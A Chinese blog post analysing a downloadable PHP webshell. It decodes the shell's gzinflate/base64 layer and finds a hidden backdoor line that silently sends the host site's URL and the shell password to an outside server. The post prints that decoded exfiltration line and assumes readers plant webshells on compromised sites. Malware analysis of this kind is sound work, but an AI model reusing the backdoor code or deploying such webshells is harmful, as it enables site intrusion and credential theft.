一、PHP大马准备

PHP大马，示例如图所示，后台回复 phpdama-1 即可下载

二、分析过程

第一步： 拿到 PHP 大马之后，查看源码，发现被加密了，而且采用的是 gzinflate+base64 加密

第二步： 既然已经知道了加密方式，接下来就是解密，解密脚本如下

gzinflate+base64-jm.php解密脚本：

<?php   $Code = 'XXXXX';//待解密的密文  $File = 'jiemi.php';//解码后保存的文件   $Temp = base64_decode($Code);   $temp = gzinflate($Temp);   $FP = fopen($File,"w");   fwrite($FP,$temp);   fclose($FP);   echo "解密成功！"; ?>

浏览器访问一下 http://127.0.0.1/gzinflate+base64-jm.php 解密文件之后，在同目录下生成解密之后的文件 jiemi.php

查看 jiemi.php 文件，代码内容还很多。

第三步： 查找后门
一般后门都会把当前 webshell（PHP大马） 的密码和 IP 地址一起发送给后门的创造者，那么我们可以先查看当前 PHP大马 传递密码的变量，发现：$password=‘admin’; 变量是 $password。

接下来就可以去已经解密出来的 jiemi.php 文件中搜索该变量
经搜索发现 $password 变量一共在两个位置有，如下图所示。

其中第一处比较可疑。
file_get_contents() ：该函数是用于把文件的内容读入到一个字符串中的首选方法。
接下来对该段代码进行解密，解密内容如下：

@file_get_contents(base64_decode('aHR0cDovLzQ1Njc3Nzg5LmNvbS8/aG09').urlencode(base64_decode('aHR0cDovLw==').$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF']."||".$password)."&bz=php");

经过解密之后，拼接该段字符串内容是：http://45677789.com/?hm=http://127.0.0.1/phpdama-1.php||&bz=php（这个就是后门）

后门找到了，也就是说，你废了很大劲拿了一个网站，并且把这个 php大马 传到网站上之后，只要你访问使用这个 PHP大马 就会自动把大马当前所在网站的地址以及密码传给 http://45677789.com这个服务器。

更多资源：

1、web安全工具、渗透测试工具
2、存在漏洞的网站源码与代码审计+漏洞复现教程、
3、渗透测试学习视频、应急响应学习视频、代码审计学习视频、都是2019-2021年期间的较新视频
4、应急响应真实案例复现靶场与应急响应教程

收集整理在知识星球，可加入知识星球进行查看。也可搜索关注微信公众号：W小哥

原文始发于微信公众号（W小哥）：实战分析PHP大马隐藏后门——案例一